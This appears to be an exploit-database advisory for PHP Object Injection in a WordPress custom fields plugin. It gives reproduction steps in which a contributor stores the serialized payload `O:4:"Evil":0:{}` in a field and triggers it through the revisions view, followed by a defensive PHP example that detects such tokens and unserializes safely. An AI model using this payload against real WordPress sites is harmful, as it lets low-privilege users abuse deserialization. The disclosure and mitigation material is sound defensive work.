## https://sploitus.com/exploit?id=WPEX-ID:8E5EC88E-0E66-44E4-BBF2-74155D849EDE
Setup (as admin)

- To simulate a gadget chain, put the following code in a plugin:

```php
class Evil {
  // __wakeup() is a magic method that PHP calls automatically on unserialize()
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}
```

- Activate the plugin, access the Custom Fields Menu and create a simple Field Group

Attack (as a contributor)
- Create a new post with dummy content, fill in the plugin's text field at the bottom of the screen with `O:4:"Evil":0:{}`, then save the draft
- Reload the page and click "x revisions"; this triggers the PHP Object Injection
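
A defensive counterpart to the steps above, as an added example that is not code from the plugin or from the original advisory: it flags field values that carry a serialized object and shows that `unserialize()` with `allowed_classes => false` does not run the `Evil::__wakeup()` gadget. The helper names `contains_serialized_object` and `safe_unserialize` and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example (not the plugin's code): handling an untrusted field value
// like the one entered in the steps above.

class Evil {
    public function __wakeup(): void {
        // Stand-in for the gadget from the setup step; records the call
        // instead of calling die() so the script can report on it.
        $GLOBALS['wakeup_fired'] = true;
    }
}

/**
 * Hypothetical helper: true if the string contains an object (O:) or
 * custom-serialized object (C:) token at the top level or nested.
 * Pattern match only, so string data that looks like a token also matches.
 */
function contains_serialized_object(string $value): bool {
    return preg_match('/(^|[;{}])[OC]:\d+:"/', trim($value)) === 1;
}

/**
 * Hypothetical helper: unserialize without instantiating any class.
 * Objects come back as __PHP_Incomplete_Class, so no magic methods run.
 */
function safe_unserialize(string $value) {
    return @unserialize($value, ['allowed_classes' => false]);
}

$samples = [ // constructed sample inputs
    'O:4:"Evil":0:{}',              // value used in the steps above
    'a:1:{i:0;O:4:"Evil":0:{}}',    // same object nested in an array
    'a:1:{s:3:"key";s:5:"value";}', // benign serialized array
    'plain text',                   // ordinary field content
];

foreach ($samples as $s) {
    $GLOBALS['wakeup_fired'] = false;
    $result = safe_unserialize($s);
    printf("%-32s object_token=%-5s wakeup=%-5s type=%s\n",
        $s,
        var_export(contains_serialized_object($s), true),
        var_export($GLOBALS['wakeup_fired'], true),
        is_object($result) ? get_class($result) : gettype($result));
}
```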